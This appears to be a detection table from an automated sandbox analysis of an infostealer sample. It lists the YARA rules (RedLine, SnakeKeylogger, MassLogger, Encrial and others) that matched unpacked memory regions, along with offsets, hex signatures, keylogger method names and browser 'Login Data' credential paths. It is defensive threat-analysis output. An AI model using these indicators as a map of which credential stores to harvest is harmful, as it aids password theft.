7.2.dajivhqI.pif.46b268.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.1.dajivhqI.pif.400000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.dajivhqI.pif.2b326458.10.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.dajivhqI.pif.2b326458.10.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.dajivhqI.pif.2b326458.10.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
7.2.dajivhqI.pif.2b326458.10.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.dajivhqI.pif.2b326458.10.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.dajivhqI.pif.2b326458.10.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1a8b4:$a1: get_encryptedPassword 0x1a888:$a2: get_encryptedUsername 0x1a94c:$a3: get_timePasswordChanged 0x1a864:$a4: get_passwordField 0x1a8ca:$a5: set_encryptedPassword 0x1a697:$a7: get_logins 0x19c21:$a8: GetOutlookPasswords 0x19135:$a9: StartKeylogger 0x17b8f:$a10: KeyLoggerEventArgs 0x17b5e:$a11: KeyLoggerEventArgsEventHandler 0x1a76b:$a13: _encryptedPassword
7.2.dajivhqI.pif.2b326458.10.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1efaf:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e4ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x1e7bb:$a4: \Orbitum\User Data\Default\Login Data 0x1f5b3:$a5: \Kometa\User Data\Default\Login Data
7.2.dajivhqI.pif.2a0c0000.5.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.dajivhqI.pif.2a0c0000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.dajivhqI.pif.2a0c0000.5.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
7.2.dajivhqI.pif.2a0c0000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.dajivhqI.pif.2a0c0000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.dajivhqI.pif.2a0c0000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d59c:$a1: get_encryptedPassword 0x1d570:$a2: get_encryptedUsername 0x1d634:$a3: get_timePasswordChanged 0x1d54c:$a4: get_passwordField 0x1d5b2:$a5: set_encryptedPassword 0x1d37f:$a7: get_logins 0x1c909:$a8: GetOutlookPasswords 0x1be1d:$a9: StartKeylogger 0x1a877:$a10: KeyLoggerEventArgs 0x1a846:$a11: KeyLoggerEventArgsEventHandler 0x1d453:$a13: _encryptedPassword
7.2.dajivhqI.pif.438038.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f2b0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f930:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
7.2.dajivhqI.pif.2a0c0000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x21c97:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21195:$a3: \Google\Chrome\User Data\Default\Login Data 0x214a3:$a4: \Orbitum\User Data\Default\Login Data 0x2229b:$a5: \Kometa\User Data\Default\Login Data
7.2.dajivhqI.pif.2b326458.10.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.dajivhqI.pif.2b326458.10.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.dajivhqI.pif.2b326458.10.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
7.2.dajivhqI.pif.2b326458.10.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.dajivhqI.pif.2b326458.10.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.dajivhqI.pif.2a0c0000.5.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.dajivhqI.pif.2a0c0000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.dajivhqI.pif.2a0c0000.5.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
7.2.dajivhqI.pif.2a0c0000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.dajivhqI.pif.2a0c0000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.dajivhqI.pif.2b326458.10.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c6b4:$a1: get_encryptedPassword 0x445ec:$a1: get_encryptedPassword 0x1c688:$a2: get_encryptedUsername 0x445c0:$a2: get_encryptedUsername 0x1c74c:$a3: get_timePasswordChanged 0x44684:$a3: get_timePasswordChanged 0x1c664:$a4: get_passwordField 0x4459c:$a4: get_passwordField 0x1c6ca:$a5: set_encryptedPassword 0x44602:$a5: set_encryptedPassword 0x1c497:$a7: get_logins 0x443cf:$a7: get_logins 0x1ba21:$a8: GetOutlookPasswords 0x43959:$a8: GetOutlookPasswords 0x1af35:$a9: StartKeylogger 0x42e6d:$a9: StartKeylogger 0x1998f:$a10: KeyLoggerEventArgs 0x418c7:$a10: KeyLoggerEventArgs 0x1995e:$a11: KeyLoggerEventArgsEventHandler 0x41896:$a11: KeyLoggerEventArgsEventHandler 0x1c56b:$a13: _encryptedPassword
7.2.dajivhqI.pif.2a0c0ee8.6.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.dajivhqI.pif.2a0c0ee8.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.dajivhqI.pif.2a0c0ee8.6.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
7.2.dajivhqI.pif.2a0c0ee8.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.dajivhqI.pif.2a0c0ee8.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.dajivhqI.pif.2a0c0000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1b79c:$a1: get_encryptedPassword 0x1b770:$a2: get_encryptedUsername 0x1b834:$a3: get_timePasswordChanged 0x1b74c:$a4: get_passwordField 0x1b7b2:$a5: set_encryptedPassword 0x1b57f:$a7: get_logins 0x1ab09:$a8: GetOutlookPasswords 0x1a01d:$a9: StartKeylogger 0x18a77:$a10: KeyLoggerEventArgs 0x18a46:$a11: KeyLoggerEventArgsEventHandler 0x1b653:$a13: _encryptedPassword
7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.dajivhqI.pif.2b326458.10.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20daf:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ce7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x202ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x481e5:$a3: \Google\Chrome\User Data\Default\Login Data 0x205bb:$a4: \Orbitum\User Data\Default\Login Data 0x484f3:$a4: \Orbitum\User Data\Default\Login Data 0x213b3:$a5: \Kometa\User Data\Default\Login Data 0x492eb:$a5: \Kometa\User Data\Default\Login Data
7.2.dajivhqI.pif.2a0c0000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1fe97:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1f395:$a3: \Google\Chrome\User Data\Default\Login Data 0x1f6a3:$a4: \Orbitum\User Data\Default\Login Data 0x2049b:$a5: \Kometa\User Data\Default\Login Data
7.2.dajivhqI.pif.2a0c0ee8.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1a8b4:$a1: get_encryptedPassword 0x1a888:$a2: get_encryptedUsername 0x1a94c:$a3: get_timePasswordChanged 0x1a864:$a4: get_passwordField 0x1a8ca:$a5: set_encryptedPassword 0x1a697:$a7: get_logins 0x19c21:$a8: GetOutlookPasswords 0x19135:$a9: StartKeylogger 0x17b8f:$a10: KeyLoggerEventArgs 0x17b5e:$a11: KeyLoggerEventArgsEventHandler 0x1a76b:$a13: _encryptedPassword
0.2.y79a2l1FY5.exe.212fcdd8.6.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c6b4:$a1: get_encryptedPassword 0x1c688:$a2: get_encryptedUsername 0x1c74c:$a3: get_timePasswordChanged 0x1c664:$a4: get_passwordField 0x1c6ca:$a5: set_encryptedPassword 0x1c497:$a7: get_logins 0x1ba21:$a8: GetOutlookPasswords 0x1af35:$a9: StartKeylogger 0x1998f:$a10: KeyLoggerEventArgs 0x1995e:$a11: KeyLoggerEventArgsEventHandler 0x1c56b:$a13: _encryptedPassword
7.2.dajivhqI.pif.2a0c0ee8.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20daf:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x202ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x205bb:$a4: \Orbitum\User Data\Default\Login Data 0x213b3:$a5: \Kometa\User Data\Default\Login Data
7.2.dajivhqI.pif.2a0c0ee8.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1efaf:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e4ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x1e7bb:$a4: \Orbitum\User Data\Default\Login Data 0x1f5b3:$a5: \Kometa\User Data\Default\Login Data
0.2.y79a2l1FY5.exe.23ce118.0.raw.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
7.3.dajivhqI.pif.282772e8.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.3.dajivhqI.pif.282772e8.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.3.dajivhqI.pif.282772e8.0.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
7.3.dajivhqI.pif.282772e8.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.3.dajivhqI.pif.282772e8.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.3.dajivhqI.pif.282772e8.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1a8b4:$a1: get_encryptedPassword 0x1a888:$a2: get_encryptedUsername 0x1a94c:$a3: get_timePasswordChanged 0x1a864:$a4: get_passwordField 0x1a8ca:$a5: set_encryptedPassword 0x1a697:$a7: get_logins 0x19c21:$a8: GetOutlookPasswords 0x19135:$a9: StartKeylogger 0x17b8f:$a10: KeyLoggerEventArgs 0x17b5e:$a11: KeyLoggerEventArgsEventHandler 0x1a76b:$a13: _encryptedPassword
7.3.dajivhqI.pif.282772e8.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1efaf:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e4ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x1e7bb:$a4: \Orbitum\User Data\Default\Login Data 0x1f5b3:$a5: \Kometa\User Data\Default\Login Data
7.2.dajivhqI.pif.2a160000.7.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.dajivhqI.pif.2a160000.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.dajivhqI.pif.2a160000.7.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
7.2.dajivhqI.pif.2a160000.7.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.dajivhqI.pif.2a160000.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.dajivhqI.pif.2a160000.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c6b4:$a1: get_encryptedPassword 0x1c688:$a2: get_encryptedUsername 0x1c74c:$a3: get_timePasswordChanged 0x1c664:$a4: get_passwordField 0x1c6ca:$a5: set_encryptedPassword 0x1c497:$a7: get_logins 0x1ba21:$a8: GetOutlookPasswords 0x1af35:$a9: StartKeylogger 0x1998f:$a10: KeyLoggerEventArgs 0x1995e:$a11: KeyLoggerEventArgsEventHandler 0x1c56b:$a13: _encryptedPassword
7.2.dajivhqI.pif.2a160000.7.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20daf:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x202ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x205bb:$a4: \Orbitum\User Data\Default\Login Data 0x213b3:$a5: \Kometa\User Data\Default\Login Data
7.2.dajivhqI.pif.29f70a4e.4.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.dajivhqI.pif.29f70a4e.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.dajivhqI.pif.29f70a4e.4.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
7.2.dajivhqI.pif.29f70a4e.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.dajivhqI.pif.29f70a4e.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.dajivhqI.pif.29f70a4e.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d59c:$a1: get_encryptedPassword 0x1d570:$a2: get_encryptedUsername 0x1d634:$a3: get_timePasswordChanged 0x1d54c:$a4: get_passwordField 0x1d5b2:$a5: set_encryptedPassword 0x1d37f:$a7: get_logins 0x1c909:$a8: GetOutlookPasswords 0x1be1d:$a9: StartKeylogger 0x1a877:$a10: KeyLoggerEventArgs 0x1a846:$a11: KeyLoggerEventArgsEventHandler 0x1d453:$a13: _encryptedPassword
7.2.dajivhqI.pif.29f70a4e.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x21c97:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21195:$a3: \Google\Chrome\User Data\Default\Login Data 0x214a3:$a4: \Orbitum\User Data\Default\Login Data 0x2229b:$a5: \Kometa\User Data\Default\Login Data
7.1.dajivhqI.pif.438038.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f2b0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x2f930:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
7.2.dajivhqI.pif.29f70a4e.4.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.dajivhqI.pif.29f70a4e.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.dajivhqI.pif.29f70a4e.4.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
7.2.dajivhqI.pif.29f70a4e.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.dajivhqI.pif.29f70a4e.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.dajivhqI.pif.29f70a4e.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1b79c:$a1: get_encryptedPassword 0x1b770:$a2: get_encryptedUsername 0x1b834:$a3: get_timePasswordChanged 0x1b74c:$a4: get_passwordField 0x1b7b2:$a5: set_encryptedPassword 0x1b57f:$a7: get_logins 0x1ab09:$a8: GetOutlookPasswords 0x1a01d:$a9: StartKeylogger 0x18a77:$a10: KeyLoggerEventArgs 0x18a46:$a11: KeyLoggerEventArgsEventHandler 0x1b653:$a13: _encryptedPassword
7.2.dajivhqI.pif.29f70a4e.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1fe97:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1f395:$a3: \Google\Chrome\User Data\Default\Login Data 0x1f6a3:$a4: \Orbitum\User Data\Default\Login Data 0x2049b:$a5: \Kometa\User Data\Default\Login Data
7.2.dajivhqI.pif.29f71936.3.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.dajivhqI.pif.29f71936.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.dajivhqI.pif.29f71936.3.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
7.2.dajivhqI.pif.29f71936.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.dajivhqI.pif.29f71936.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.3.dajivhqI.pif.282772e8.0.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.3.dajivhqI.pif.282772e8.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.3.dajivhqI.pif.282772e8.0.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
7.3.dajivhqI.pif.282772e8.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.3.dajivhqI.pif.282772e8.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.3.dajivhqI.pif.282772e8.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c6b4:$a1: get_encryptedPassword 0x1c688:$a2: get_encryptedUsername 0x1c74c:$a3: get_timePasswordChanged 0x1c664:$a4: get_passwordField 0x1c6ca:$a5: set_encryptedPassword 0x1c497:$a7: get_logins 0x1ba21:$a8: GetOutlookPasswords 0x1af35:$a9: StartKeylogger 0x1998f:$a10: KeyLoggerEventArgs 0x1995e:$a11: KeyLoggerEventArgsEventHandler 0x1c56b:$a13: _encryptedPassword
7.2.dajivhqI.pif.29f71936.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1a8b4:$a1: get_encryptedPassword 0x1a888:$a2: get_encryptedUsername 0x1a94c:$a3: get_timePasswordChanged 0x1a864:$a4: get_passwordField 0x1a8ca:$a5: set_encryptedPassword 0x1a697:$a7: get_logins 0x19c21:$a8: GetOutlookPasswords 0x19135:$a9: StartKeylogger 0x17b8f:$a10: KeyLoggerEventArgs 0x17b5e:$a11: KeyLoggerEventArgsEventHandler 0x1a76b:$a13: _encryptedPassword
7.3.dajivhqI.pif.282772e8.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20daf:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x202ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x205bb:$a4: \Orbitum\User Data\Default\Login Data 0x213b3:$a5: \Kometa\User Data\Default\Login Data
7.2.dajivhqI.pif.29f71936.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1efaf:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e4ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x1e7bb:$a4: \Orbitum\User Data\Default\Login Data 0x1f5b3:$a5: \Kometa\User Data\Default\Login Data
7.2.dajivhqI.pif.29f71936.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.dajivhqI.pif.29f71936.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.dajivhqI.pif.29f71936.3.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
7.2.dajivhqI.pif.29f71936.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.dajivhqI.pif.29f71936.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.dajivhqI.pif.29f71936.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c6b4:$a1: get_encryptedPassword 0x1c688:$a2: get_encryptedUsername 0x1c74c:$a3: get_timePasswordChanged 0x1c664:$a4: get_passwordField 0x1c6ca:$a5: set_encryptedPassword 0x1c497:$a7: get_logins 0x1ba21:$a8: GetOutlookPasswords 0x1af35:$a9: StartKeylogger 0x1998f:$a10: KeyLoggerEventArgs 0x1995e:$a11: KeyLoggerEventArgsEventHandler 0x1c56b:$a13: _encryptedPassword
7.2.dajivhqI.pif.29f71936.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20daf:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x202ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x205bb:$a4: \Orbitum\User Data\Default\Login Data 0x213b3:$a5: \Kometa\User Data\Default\Login Data
7.2.dajivhqI.pif.2b325570.8.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.dajivhqI.pif.2b325570.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.dajivhqI.pif.2b325570.8.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
7.2.dajivhqI.pif.2b325570.8.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.dajivhqI.pif.2b325570.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.dajivhqI.pif.2b325570.8.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1b79c:$a1: get_encryptedPassword 0x1b770:$a2: get_encryptedUsername 0x1b834:$a3: get_timePasswordChanged 0x1b74c:$a4: get_passwordField 0x1b7b2:$a5: set_encryptedPassword 0x1b57f:$a7: get_logins 0x1ab09:$a8: GetOutlookPasswords 0x1a01d:$a9: StartKeylogger 0x18a77:$a10: KeyLoggerEventArgs 0x18a46:$a11: KeyLoggerEventArgsEventHandler 0x1b653:$a13: _encryptedPassword
7.2.dajivhqI.pif.2b325570.8.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1fe97:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1f395:$a3: \Google\Chrome\User Data\Default\Login Data 0x1f6a3:$a4: \Orbitum\User Data\Default\Login Data 0x2049b:$a5: \Kometa\User Data\Default\Login Data
7.2.dajivhqI.pif.2b34e390.9.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.dajivhqI.pif.2b34e390.9.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.dajivhqI.pif.2b34e390.9.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
7.2.dajivhqI.pif.2b34e390.9.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.dajivhqI.pif.2b34e390.9.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
